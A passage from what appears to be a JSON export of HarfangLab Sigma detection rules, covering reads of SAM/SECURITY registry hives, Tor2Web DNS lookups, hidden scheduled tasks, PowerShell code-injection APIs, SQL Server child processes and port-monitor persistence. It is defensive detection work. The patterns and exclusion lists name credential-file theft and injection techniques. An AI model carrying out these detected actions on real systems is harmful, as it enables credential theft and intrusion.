"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623783Z",
"creation_date": "2026-03-23T11:45:34.623784Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623789Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1003/004/"
],
"name": "t1003_registry_access_filesystem.yml",
"content": "title: Sensitive Registry Hive Accessed\nid: 885df422-ec8e-4f5d-81dc-26e4d816601f\ndescription: |\n Detects file accesses to registry hives files.\n Attackers may read registry hives directly from the disk, including backup files.\n This can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\n It is recommended to investigate the process trying to access the hives for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2024/07/03\nmodified: 2025/12/01\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: filesystem_event\n product: windows\ndetection:\n selection:\n Path|endswith:\n - ':\\Windows\\System32\\config\\SAM'\n - ':\\Windows\\System32\\config\\SECURITY'\n - ':\\Windows\\System32\\config\\RegBack\\SAM'\n - ':\\Windows\\System32\\config\\RegBack\\SECURITY'\n Kind: 'read'\n Image|contains: '?'\n\n filter_registry:\n ProcessName: 'Registry'\n ProcessParentName: 'System'\n\n filter_registry_missing1:\n ProcessName: 'Registry'\n ProcessSize: 0\n\n filter_registry_missing2:\n ProcessName: 'Registry'\n ProcessSha256: '0000000000000000000000000000000000000000000000000000000000000000'\n\n filter_invalid_path:\n Path|startswith:\n - '?:\\$WINDOWS.~BT\\'\n - '?:\\$WinREAgent\\'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_dism:\n Image:\n - '?:\\Windows\\Temp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Temp\\\\????????-????-????-????-????????????\\DismHost.exe'\n - '?:\\Windows\\System32\\Dism.exe'\n\n exclusion_dism_plus:\n ProcessOriginalFileName: 'Dism++.exe'\n ProcessCompany: 
'Chuyu Team'\n ProcessProduct: 'Dism++'\n\n exclusion_sources:\n Image: '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe'\n\n exclusion_windows_bin:\n Image:\n - '?:\\Windows\\System32\\SrTasks.exe'\n - '?:\\Windows\\System32\\ntdsutil.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Platform\\\\*\\MsSense.exe'\n ProcessSignature :\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_vssvc:\n Image: '?:\\Windows\\System32\\VSSVC.exe'\n\n exclusion_sppcreation:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_svchost:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted*'\n - '?:\\windows\\system32\\svchost.exe -k sysmain*'\n - '?:\\Windows\\system32\\svchost.exe -k wsappx*'\n - '?:\\Windows\\system32\\svchost.exe -k defragsvc'\n\n exclusion_rundll:\n ProcessCommandLine: '?:\\Windows\\system32\\rundll32.exe aepdu.dll,AePduRunUpdate'\n ProcessParentImage: '?:\\Windows\\system32\\services.exe'\n\n exclusion_taskhost:\n Image:\n - '?:\\Windows\\System32\\taskhostw.exe'\n - '?:\\Windows\\System32\\taskhost.exe'\n - '?:\\Windows\\WinSxS\\\\*\\taskhost.exe'\n\n exclusion_vmcompute:\n Image: '?:\\Windows\\System32\\vmwp.exe'\n ProcessParentImage: '?:\\Windows\\System32\\vmcompute.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_winsat:\n Image: '?:\\Windows\\System32\\WinSAT.exe'\n ProcessParentCommandLine: '?:\\WINDOWS\\system32\\rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask'\n\n exclusion_wbengine:\n Image: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_wmiprvse:\n Image: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_docker:\n Image: 
'?:\\Windows\\System32\\dockerd.exe'\n\n exclusion_bitdefender:\n Image|endswith: '\\Bitdefender\\Endpoint Security\\EPSecurityService.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Bitdefender SRL'\n\n exclusion_trendmicro:\n ProcessProcessName:\n - 'TmCCSF.exe'\n # C:\\Program Files (x86)\\Trend Micro\\Security Agent\\Ntrtscan.exe\n - 'Ntrtscan.exe'\n - 'coreServiceShell.exe' # C:\\Program Files\\Trend Micro\\AMSP\\coreServiceShell.exe\n - 'TMBMSRV.exe' # C:\\Program Files (x86)\\Trend Micro\\BM\\TMBMSRV.exe\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n exclusion_dllhost:\n # Used when copy file from explorer when UAC is enabled\n ProcessImage: '?:\\Windows\\system32\\DllHost.exe'\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_citrix:\n ProcessImage|endswith: '\\citrix\\provisioning services\\soapserver.exe'\n\n exclusion_hdclone:\n ProcessOriginalFileName: 'hdclone.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Miray Software AG'\n\n exclusion_sophos:\n Image: '?:\\ProgramData\\Sophos\\AutoUpdate\\Cache\\sophos_autoupdate?.dir\\su-repair.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Sophos Limited'\n - 'Sophos Ltd'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "885df422-ec8e-4f5d-81dc-26e4d816601f",
"rule_name": "Sensitive Registry Hive Accessed",
"rule_description": "Detects read accesses to the on-disk SAM and SECURITY registry hive files (%SystemRoot%\\System32\\config), including their RegBack backup copies.\nAttackers may read registry hives directly from the disk, including backup files.\nThis can be indicative of an attempt to access sensitive information stored in these hives (such as the SAM account database or the LSA secrets) for credential access.\nNote that reads of the SYSTEM hive and of hive copies saved to other locations are not covered by this rule, and that processes running from Program Files are excluded.\nIt is recommended to investigate the process trying to access the hives for malicious content.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-12-01",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "885f4356-e788-4be5-8463-3d400a7f4b80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.602902Z",
"creation_date": "2026-03-23T11:45:34.602906Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.602913Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://resources.infosecinstitute.com/topics/malware-analysis/malware-dark-web/",
"https://attack.mitre.org/techniques/T1090/003",
"https://attack.mitre.org/software/S0183"
],
"name": "t1090_003_tor2web_proxy.yml",
"content": "title: Tor2Web Proxy Network Request\nid: 885f4356-e788-4be5-8463-3d400a7f4b80\ndescription: |\n Detects DNS requests for domains associated with Tor2Web proxies, such as onion.pw or onion.ws.\n Tor2Web proxies are often used by RaaS (Ransomware-as-a-Service) operators or botnets to reach C&C servers hidden in the Tor network.\n This spares adversaries the need to embed onion-routing capabilities in their malware while still keeping the C&C server anonymous.\n A DNS query alone does not prove that a connection was established; it is recommended to investigate the querying process and to look for subsequent network connections to the resolved host.\nreferences:\n - https://resources.infosecinstitute.com/topics/malware-analysis/malware-dark-web/\n - https://attack.mitre.org/techniques/T1090/003\n - https://attack.mitre.org/software/S0183\ndate: 2023/10/31\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090.003\n - attack.s0183\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - 'onion.ws'\n - 'onion.pw'\n\n condition: selection\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "885f4356-e788-4be5-8463-3d400a7f4b80",
"rule_name": "Tor2Web Proxy Network Request",
"rule_description": "Detects DNS requests for domains associated with Tor2Web proxies, such as onion.pw or onion.ws.\nTor2Web proxies are often used by RaaS (Ransomware-as-a-Service) operators or botnets to reach C&C servers hidden in the Tor network.\nThis spares adversaries the need to embed onion-routing capabilities in their malware while still keeping the C&C server anonymous.\nA DNS query alone does not prove that a connection was established; it is recommended to investigate the querying process and to look for subsequent network connections to the resolved host.\n",
"rule_creation_date": "2023-10-31",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1090.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88bbb3c0-be25-4bf1-aac1-0dc8e82f090b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621859Z",
"creation_date": "2026-03-23T11:45:34.621861Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621865Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1053/"
],
"name": "t1112_hidden_scheduled_task.yml",
"content": "title: Scheduled Task Security Descriptor Deleted\nid: 88bbb3c0-be25-4bf1-aac1-0dc8e82f090b\ndescription: |\n Detects the deletion of a scheduled task's Security Descriptor (SD).\n Attackers often create scheduled tasks on infected systems to achieve persistence.\n To hide the presence of a specific scheduled task, an attacker can delete the SD value within the registry path.\n However, the deletion requires the attacker to run in the context of the SYSTEM user.\n It is recommended to investigate the process at the origin of this registry modification and the scheduled task targeted by the deletion itself to determine the legitimacy of this action.\nreferences:\n - https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1053/\ndate: 2022/05/05\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - attack.execution\n - attack.persistence\n - attack.t1053\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'DeleteValue'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\\\*\\SD'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k 
UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_panda:\n ProcessImage:\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\PSANHost.exe'\n - '.:\\Program Files (x86)\\Panda Security\\Panda Security Protection\\PSANHost.exe'\n\n exclusion_total_uninstall:\n ProcessImage: '?:\\Program Files\\Total Uninstall *\\Tu.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88bbb3c0-be25-4bf1-aac1-0dc8e82f090b",
"rule_name": "Scheduled Task Security Descriptor Deleted",
"rule_description": "Detects the deletion of a scheduled task's Security Descriptor (SD) registry value under HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree.\nAttackers often create scheduled tasks on infected systems to achieve persistence.\nTo hide the presence of a specific scheduled task from the usual enumeration tools, an attacker can delete the SD value of its Tree subkey.\nHowever, the deletion requires the attacker to run in the context of the SYSTEM user.\nIt is recommended to investigate the process at the origin of this registry modification and the scheduled task targeted by the deletion itself to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-05-05",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1053",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88e012a4-b507-4285-acbc-b621ecda222f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085023Z",
"creation_date": "2026-03-23T11:45:34.085025Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085029Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_powershell_suspicious_code_injection.yml",
"content": "title: Suspicious Code Injection via PowerShell\nid: 88e012a4-b507-4285-acbc-b621ecda222f\ndescription: |\n Detects the execution of a suspicious PowerShell script containing cmdlets that may perform code injection.\n Attackers may use code injection to inject code into remote processes, aiming for privilege escalation, data theft or defense evasion.\n It is recommended to investigate the PowerShell script in question, check for signs of code injection, review the executed command-line arguments, and analyze the process tree for any suspicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/11/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1218\n - attack.execution\n - attack.t1106\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_dotnet_apis:\n PowershellCommand|contains:\n - 'DefineDynamicAssembly'\n - 'DefineDynamicModule'\n - 'Add-Type'\n - 'GetDelegateForFunctionPointer'\n - \"GetType('Microsoft.Win32.UnsafeNativeMethods')\"\n\n selection_memory_apis:\n PowershellCommand|contains:\n - 'VirtualAlloc'\n - 'VirtualProtect'\n - 'WriteProcessMemory'\n - 'RtlCreateUserThread'\n - 'CreateUserThread'\n - 'CreateThread'\n - 'CreateRemoteThread'\n - 'QueueUserApc'\n\n exclusion_defender_av:\n ProcessCurrentDirectory:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\'\n ProcessCommandLine|contains|all:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\AntiVirus.psm1'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\EDR.psm1'\n - 
'?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1'\n\n exclusion_defender_av2:\n ProcessCurrentDirectory: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\'\n ProcessCommandLine|contains:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_*.ps1'\n - '?:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command &'\n\n exclusion_defender_av3:\n PowershellScriptPath: '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\SenseCM\\PolicyEnforcer.ps1'\n\n # https://www.powershellgallery.com/packages/dbatools/1.0.135/Content/allcommands.ps1\n exclusion_dbatools:\n PowershellCommand|contains|all:\n - '#.ExternalHelp dbatools-Help.xml'\n - 'function Add-DbaAgDatabase {'\n - 'SLEEP_RETRY_VIRTUALALLOC'\n - 'function Add-DbaAgListener {'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88e012a4-b507-4285-acbc-b621ecda222f",
"rule_name": "Suspicious Code Injection via PowerShell",
"rule_description": "Detects the execution of a suspicious PowerShell script containing cmdlets that may perform code injection.\nAttackers may use code injection to inject code into remote processes, aiming for privilege escalation, data theft or defense evasion.\nIt is recommended to investigate the PowerShell script in question, check for signs of code injection, review the executed command-line arguments, and analyze the process tree for any suspicious activity.\n",
"rule_creation_date": "2021-11-23",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1218",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88e5b7e0-e305-4e21-a287-03993926f06e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295263Z",
"creation_date": "2026-03-23T11:45:35.295267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295275Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-powershell-script-job-step?view=sql-server-2016",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_sqlservr_susp_child.yml",
"content": "title: Suspicious Process Executed by SQLServer\nid: 88e5b7e0-e305-4e21-a287-03993926f06e\ndescription: |\n Detects the execution of a suspicious process by SQLServer.\n Attackers may abuse built-in MSSQL Server functionalities in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-powershell-script-job-step?view=sql-server-2016\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/07/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\sqlservr.exe'\n Image|startswith: '?:\\' # Avoid detection on remote image\n\n # This is handled by the rule 48a4e8ec-4a97-4420-8fd1-9ce20191c569\n filter_cmd:\n Image:\n - '?:\\windows\\system32\\cmd.exe'\n - '?:\\windows\\syswow64\\cmd.exe'\n\n exclusion_werfault:\n Image:\n - '?:\\WINDOWS\\system32\\WerFault.exe'\n - '?:\\WINDOWS\\syswow64\\WerFault.exe'\n\n exclusion_conhost:\n Image:\n - '?:\\WINDOWS\\system32\\conhost.exe'\n - '?:\\WINDOWS\\syswow64\\conhost.exe'\n CommandLine:\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1'\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff'\n - '\\\\??\\\\?:\\WINDOWS\\system32\\conhost.exe 0x4'\n\n exclusion_mssqltools:\n Image|endswith:\n - '\\Tools\\Binn\\\\*.exe'\n - '\\DTS\\Binn\\\\*.exe'\n - '\\COM\\\\*.exe'\n - 
'\\shared\\\\*.exe'\n - 'MSSQL\\\\Binn\\\\*.exe'\n - '\\LocalDB\\Binn\\\\*.exe'\n - '?:\\Windows\\WID\\Binn\\SqlDumper.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_mssqltools_unsigned:\n - Image:\n - '?:\\Program Files (x86)\\Microsoft SQL Server\\80\\Tools\\Binn\\DTSRun.exe'\n - '?:\\Program Files\\Microsoft SQL Server\\\\*\\Tools\\Binn\\DTSRun.exe'\n - Image|endswith: 'MSSQL\\Binn\\slssqlmaint.exe'\n ProcessDescription: 'LiteSpeed maintenance utility'\n\n exclusion_litespeed:\n - Image: '?:\\Program Files\\Quest Software\\LiteSpeed\\SQL Server\\Engine\\SQLLiteSpeedx64.exe'\n ProcessDescription: 'LiteSpeed Backup/Restore Engine'\n\n exclusion_pcaui:\n Image: '?:\\Windows\\System32\\pcaui.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "88e5b7e0-e305-4e21-a287-03993926f06e",
"rule_name": "Suspicious Process Executed by SQLServer",
"rule_description": "Detects the execution of a suspicious process by SQLServer.\nAttackers may abuse built-in MSSQL Server functionalities in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "88ec665f-3f70-4356-9ad5-87781eb00cbe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089119Z",
"creation_date": "2026-03-23T11:45:34.089121Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089126Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/010/"
],
"name": "t1547_010_persistence_port_monitors.yml",
"content": "title: Port Monitor Installed\nid: 88ec665f-3f70-4356-9ad5-87781eb00cbe\ndescription: |\n Detects the installation of a new port monitor on the system.\n Port Monitors are DLLs loaded and run by the print spooler service, spoolsv.exe, under SYSTEM level permissions on boot.\n Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation.\n It is recommended to investigate the process that performed the registry modification as well as the target DLL at the path in the registry details.\nreferences:\n - https://attack.mitre.org/techniques/T1547/010/\ndate: 2020/09/24\nmodified: 2025/11/24\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.010\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors\\\\*\\Driver'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n filter_dword:\n Details|startswith: 'DWORD '\n\n filter_programfiles:\n - ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n # \\\\HOST\\C$\\Program Files (x86)\\Systancia\\AppliDis\\AppliDis Serveur\\bin\\Printer\\AddClearUPrinter.exe\n - '\\\\\\*\\\\*\\Program Files (x86)\\'\n - '\\\\\\*\\\\*\\Program Files\\'\n - Details|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n filter_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\spoolsv.exe'\n - '?:\\Windows\\System32\\PrintIsolationHost.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\inetsrv\\w3wp.exe'\n - '?:\\Windows\\System32\\poqexec.exe'\n - '?:\\Windows\\ccmcache\\\\*\\setup.exe'\n\n exclusion_spoolsv:\n 
